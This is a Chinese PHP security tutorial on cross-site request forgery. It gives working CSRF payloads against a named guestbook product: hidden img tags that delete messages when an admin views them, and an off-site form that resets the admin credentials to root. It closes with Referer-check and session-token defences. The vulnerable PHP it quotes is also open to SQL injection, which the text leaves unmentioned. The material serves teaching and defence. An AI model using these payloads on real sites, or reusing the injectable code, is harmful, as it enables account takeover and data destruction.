PHP漏洞全解(六)-跨网站请求伪造

 CSRF(Cross Site Request Forgeries)，意为跨网站请求伪造，也有写为XSRF。攻击者伪造目标用户的HTTP请求，然后此请求发送到有CSRF漏洞的网站，网站执行此请求后，引发跨站请求伪造攻击。攻击者利用隐蔽的HTTP连接，让目标用户在不注意的情况下单击这个链接，由于是用户自己点击的，而他又是合法用户拥有合法权限，所以目标用户能够在网站内执行特定的HTTP链接，从而达到攻击者的目的。 例如:某个购物网站购买商品时，采用http://www.shop.com/buy.php?item=watch&num=1，item参数确定要购买什么物品，num参数确定要购买数量，如果攻击者以隐藏的方式发送给目标用户链接 <img src="http://www.shop.com/buy.php?item=watch&num=1000"/>，那么如果目标用户不小心访问以后，购买的数量就成了1000个   实例 随缘网络PHP留言板V1.0   任意删除留言 //delbook.php 此页面用于删除留言 <?php include_once("dlyz.php");    //dlyz.php用户验证权限，当权限是admin的时候方可删除留言 include_once("../conn.php"); $del=$_GET["del"]; $id=$_GET["id"]; if ($del=="data") { $ID_Dele= implode(",",$_POST['adid']); $sql="delete from book where id in (".$ID_Dele.")"; mysql_query($sql); } else { $sql="delete from book where id=".$id; //传递要删除的留言ID mysql_query($sql); } mysql_close($conn); echo "<script language='javascript'>";  echo "alert('删除成功！');"; echo " location='book.php';";  echo "</script>"; ?> 当我们具有admin权限，提交http://localhost/manage/delbook.php?id=2 时，就会删除id为2的留言 利用方法: 我们使用普通用户留言（源代码方式），内容为 <img src="delbook.php?id=2" /> <img src="delbook.php?id=3" /> <img src="delbook.php?id=4" /> <img src="delbook.php?id=5" /> 插入4张图片链接分别删除4个id留言，然后我们返回首页浏览看，没有什么变化。。图片显示不了  现在我们再用管理员账号登陆后，来刷新首页，会发现留言就剩一条，其他在图片链接中指定的ID号的留言，全部都被删除。 攻击者在留言中插入隐藏的图片链接，此链接具有删除留言的作用，而攻击者自己访问这些图片链接的时候，是不具有权限的，所以看不到任何效果，但是当管理员登陆后，查看此留言，就会执行隐藏的链接，而他的权限又是足够大的，从而这些留言就被删除了 修改管理员密码 //pass.php if($_GET["act"]) { $username=$_POST["username"]; $sh=$_POST["sh"]; $gg=$_POST["gg"]; $title=$_POST["title"]; $copyright=$_POST["copyright"]."<br/>设计制作：<a href=http://www.115cn.cn>厦门随缘网络科技</a>"; $password=md5($_POST["password"]); if(empty($_POST["password"])) { $sql="update gly set username='".$username."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1"; } else { $sql="update gly set username='".$username."',password='".$password."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1"; } mysql_query($sql); mysql_close($conn); echo "<script language='javascript'>";  echo "alert('修改成功！');"; echo " location='pass.php';";  echo "</script>"; } 这个文件用于修改管理密码和网站设置的一些信息，我们可以直接构造如下表单: <body> <form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1"> <input type="radio" value="1"  name="sh"> <input type="radio" name="sh" checked value="0">  <input type="text" name="username" value="root"> <input type="password" name="password" value="root">  <input type="text"  name="title"  value="随缘网络PHP留言板V1.0(带审核功能)" > <textarea  name="gg"  rows="6" cols="80" >欢迎您安装使用随缘网络PHP留言板V1.0(带审核功能)！</textarea> <textarea  name="copyright"  rows="6" cols="80" >随缘网络PHP留言本V1.0  版权所有：厦门随缘网络科技 2005-2009<br/>承接网站建设及系统定制 提供优惠主机域名</textarea> </form> </body> 存为attack.html，放到自己网站上http://www.sectop.com/attack.html，此页面访问后会自动向目标程序的pass.php提交参数，用户名修改为root，密码修改为root，然后我们去留言板发一条留言，隐藏这个链接，管理访问以后，他的用户名和密码全部修改成了root   防范方法 防范CSRF要比防范其他攻击更加困难，因为CSRF的HTTP请求虽然是攻击者伪造的，但是却是由目标用户发出的，一般常见的防范方法有下面几种: 1、检查网页的来源 2、检查内置的隐藏变量 3、使用POST，不要使用GET 检查网页来源 在//pass.php头部加入以下红色字体代码，验证数据提交   if($_GET["act"]) { if(isset($_SERVER["HTTP_REFERER"])) {         $serverhost = $_SERVER["SERVER_NAME"];         $strurl   = str_replace("http://","",$_SERVER["HTTP_REFERER"]);           $strdomain = explode("/",$strurl);                    $sourcehost    = $strdomain[0];                       if(strncmp($sourcehost, $serverhost, strlen($serverhost)))         {                 unset($_POST);                 echo "<script language='javascript'>";                  echo "alert('数据来源异常!');";                 echo " location='index.php';";                  echo "</script>";         } } $username=$_POST["username"]; $sh=$_POST["sh"]; $gg=$_POST["gg"]; $title=$_POST["title"]; $copyright=$_POST["copyright"]."<br/>设计制作：<a href=http://www.115cn.cn>厦门随缘网络科技</a>"; $password=md5($_POST["password"]); if(empty($_POST["password"])) { $sql="update gly set username='".$username."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1"; } else { $sql="update gly set username='".$username."',password='".$password."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1"; } mysql_query($sql); mysql_close($conn); echo "<script language='javascript'>";  echo "alert('修改成功！');"; echo " location='pass.php';";  echo "</script>"; } 检查内置隐藏变量 我们在表单中内置一个隐藏变量和一个session变量，然后检查这个隐藏变量和session变量是否相等，以此来判断是否同一个网页所调用 <?php include_once("dlyz.php"); include_once("../conn.php"); if($_GET["act"]) { if (!isset($_SESSION["post_id"])) {          // 生成唯一的ID，并使用MD5来加密          $post_id = md5(uniqid(rand(), true));          // 创建Session变量          $_SESSION["post_id"] = $post_id; } // 检查是否相等 if (isset($_SESSION["post_id"])) {          // 不相等          if ($_SESSION["post_id"] != $_POST["post_id"])          {                   // 清除POST变量                   unset($_POST);                   echo "<script language='javascript'>";                    echo "alert('数据来源异常!');";                   echo " location='index.php';";                            echo "</script>";          } }   ......       <input type="reset" name="Submit2" value="重  置"> <input type="hidden" name="post_id" value="<?php echo $_SESSION["post_id"];?>"> </td></tr>   </table> </form> <?php  }  mysql_close($conn); ?> </body> </html> 使用POST，不要使用GET 传递表单字段时，一定要是用POST，不要使用GET，处理变量也不要直接使用$_REQUEST 下一期 session 会话劫持